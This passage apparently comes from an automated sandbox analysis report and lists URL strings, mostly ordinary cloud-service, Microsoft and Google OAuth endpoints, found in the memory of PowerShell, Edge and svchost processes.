                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                      Source: svchost.exe, 00000006.00000003.2314733738.00000172BE49E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000006.00000003.2314733738.00000172BE440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD45E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD454DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2484635912.000001DD5CD8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.535umer
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                      Source: msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000005.00000002.2402463079.000009BC003A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                      Source: powershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSessionI
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                      Source: msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABI
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSessionI
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin0
                      Source: msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLoginI
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
